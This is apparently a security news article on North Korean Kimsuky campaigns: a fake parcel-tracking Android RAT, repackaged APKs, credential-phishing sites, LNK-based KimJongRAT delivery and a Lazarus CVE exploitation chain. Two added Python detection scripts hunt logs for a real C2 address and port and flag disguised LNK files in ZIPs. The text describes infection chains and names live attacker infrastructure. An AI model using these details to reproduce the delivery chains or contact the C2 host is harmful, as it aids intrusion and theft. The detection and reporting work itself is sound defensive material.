“Simultaneously with service registration, the base application launches AuthActivity. This activity masquerades as an OTP authentication screen and verifies the user’s identity using a delivery number.” The shipment number is hard-coded within the APK as “742938128549,” and is likely delivered alongside the malicious URL during the initial access phase. Once the user enters the provided delivery number, the application is configured to generate a random six-digit verification code and display it as a notification, following which they are prompted to input the generated code. As soon as the code is provided, the app opens a WebView with the legitimate URL “www.cjlogistics[.]com/ko/tool/parcel/tracking,” while, in the background, the trojan connects to an attacker-controlled server (“27.102.137[.]181:50005”) and receives as many as 57 commands that allow it to log keystrokes, capture audio, start/stop camera recording, perform file operations, run commands, upload/download files, and gather location, SMS messages, contacts, call logs, and a list of installed apps.
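For defenders who hold proxy or firewall logs covering mobile devices, the chain described above can be hunted by how far each client progressed: contact with the server, download of “SecDelivery.apk”, then the connection to port 50005. This is an added example, not ENKI’s tooling; the log format, client addresses and the cdn.example.net host are constructed, and only the server address, port and APK name come from the article.

```python
from urllib.parse import urlsplit

def refang(value):
    """Turn a defanged indicator such as 1.2.3[.]4 back into a matchable string."""
    return value.replace("[.]", ".")

# Indicators exactly as printed in the article, refanged for matching.
SERVER = refang("27.102.137[.]181")
C2_PORT = "50005"
APK_NAME = "secdelivery.apk"
RANK = {"server_contact": 1, "apk_download": 2, "c2": 3}

# Constructed sample lines in an assumed format: <time> <client> <method> <target>
SAMPLE_LOG = """\
2025-12-18T09:14:02Z 10.0.4.23 GET http://27.102.137.181/SecDelivery.apk
2025-12-18T09:14:40Z 10.0.4.23 CONNECT 27.102.137.181:50005
2025-12-18T09:15:10Z 10.0.4.31 GET http://cdn.example.net/app/secdelivery.APK
2025-12-18T09:16:00Z 10.0.4.40 GET https://www.cjlogistics.com/ko/tool/parcel/tracking
2025-12-18T09:16:05Z 10.0.4.40 CONNECT 27.102.137.181:443
truncated line
"""

def classify(method, target):
    """Map one request to a stage of the chain, or None if unrelated."""
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        if host != SERVER:
            return None
        return "c2" if port == C2_PORT else "server_contact"
    url = urlsplit(target)
    if url.path.rsplit("/", 1)[-1].lower() == APK_NAME:
        return "apk_download"   # file name match, whatever host serves it
    return "server_contact" if url.hostname == SERVER else None

def furthest_stage(log_text):
    """Return {client: furthest stage reached} so responders can triage by depth."""
    reached = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue            # skip malformed or truncated lines
        _, client, method, target = parts
        stage = classify(method, target)
        if stage and RANK[stage] > RANK.get(reached.get(client), 0):
            reached[client] = stage
    return reached
```

A client that reached `c2` has a running implant and needs device-level response; one that stopped at `apk_download` may never have installed the package.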

ENKI said it also discovered two other samples disguised as a P2B Airdrop app and a trojanized version of a legitimate VPN program called BYCOM VPN (“com.bycomsolutions.bycomvpn”) that’s available on the Google Play Store and developed by an Indian IT services company named Bycom Solutions. “This indicates that the threat actor injected malicious functionality into the legitimate APK and repackaged it for use in the attack,” the security company added. Further analysis of the threat actor infrastructure has uncovered phishing sites mimicking South Korean platforms like Naver and Kakao that seek to capture users’ credentials. These sites, in turn, have been found to share overlaps with a prior Kimsuky credential harvesting campaign targeting Naver users.

“The executed malware launches a RAT service, similarly to past cases but demonstrates evolved capabilities, such as using a new native function to decrypt the internal APK and incorporating diverse decoy behaviors,” ENKI said.

Kimsuky Drops KimJongRAT Via Phishing Attack

The disclosure comes as the Kimsuky hacking group has been attributed to a phishing campaign that uses tax-themed lures to distribute a Windows remote access trojan known as KimJongRAT using ZIP file attachments containing a Windows shortcut (LNK). The LNK file is disguised as a PDF document, which, when opened, uses “mshta.exe” to execute an HTML Application (HTA) payload. The HTA malware acts as a loader to download and display a decoy PDF while simultaneously dropping the RAT payload to periodically collect and transmit user information.

This includes system metadata, as well as information from web browsers, dozens of cryptocurrency wallet extensions, Telegram, Discord, and NPKI/GPKI certificates, a digital signature certificate service used for online banking in South Korea. According to an organizational assessment released by DTEX, Kimsuky is part of the Reconnaissance General Bureau (RGB), which also houses various threat clusters responsible for conducting cryptocurrency heists and cyber espionage – an umbrella group widely referred to as the Lazarus Group. Kimsuky and Lazarus Group are known to demonstrate high levels of coordination, sharing infrastructure and attack intelligence despite their disparate roles in North Korea’s cyber apparatus. In at least one incident targeting a South Korean blockchain company, Kimsuky is believed to have first gained initial access via a phishing attack and gathered data of interest using tools like KLogEXE and FPSpy.

The next phase commenced when Lazarus Group took over by exploiting CVE-2024-38193, a now-patched privilege escalation flaw in the Windows Ancillary Function Driver (AFD.sys) for WinSock, to deliver additional payloads like FudModule, InvisibleFerret, and BeaverTail to steal private keys and transaction records from blockchain wallets, and ultimately siphon digital assets worth millions of dollars within a span of 48 hours. “Although Kimsuky and Lazarus have different tactical focuses, they both possess ‘killer weapons’ capable of breaching top-tier defenses, and their technical characteristics are ‘precise and ruthless,’” Purple Team Security Research said, describing the two clusters as a “dual-engine” approach for intelligence gathering and financial gain. “The two organizations do not operate in isolation. Kimsuky’s stolen corporate network maps and access information are synchronized in real-time to Lazarus’s attack platform.” (The story was updated after publication to include other related Kimsuky campaigns documented in recent weeks.)
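The KimJongRAT delivery step described above (a ZIP attachment holding an LNK disguised as a PDF) can be checked at a mail gateway by reading each archive member’s first bytes instead of trusting its name, since Windows Explorer hides the .lnk extension. This is an added example, not taken from the cited research; the member names and the list of decoy extensions are assumptions, and the sample archive is constructed in memory.

```python
import io
import os
import zipfile

# Shell Link header: HeaderSize 0x0000004C followed by the LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}   # assumed decoy types

def inspect_zip(zip_bytes):
    """Return [(member name, [reasons])] for members that look like disguised shortcuts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            stem, ext = os.path.splitext(info.filename.lower())
            encrypted = bool(info.flag_bits & 0x1)   # content unreadable without password
            head = b""
            if not encrypted:
                with zf.open(info) as fh:
                    head = fh.read(len(LNK_MAGIC))
            reasons = []
            if head == LNK_MAGIC:
                reasons.append("lnk_header")
                if ext != ".lnk":
                    reasons.append("lnk_header_wrong_extension")
            elif ext == ".lnk":
                reasons.append("lnk_extension_encrypted" if encrypted else "lnk_extension")
            if ext == ".lnk" and os.path.splitext(stem)[1] in DECOY_EXTS:
                reasons.append("document_double_extension")
            if reasons:
                findings.append((info.filename, reasons))
    return findings

def build_sample():
    """Constructed archive: a double-extension shortcut, a PDF, and a renamed shortcut."""
    fake_lnk = LNK_MAGIC + b"\x00" * 56        # header bytes only, not a working LNK
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("tax_notice.pdf.lnk", fake_lnk)
        zf.writestr("readme.pdf", b"%PDF-1.7\n")
        zf.writestr("invoice.pdf", fake_lnk)
    return buf.getvalue()
```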
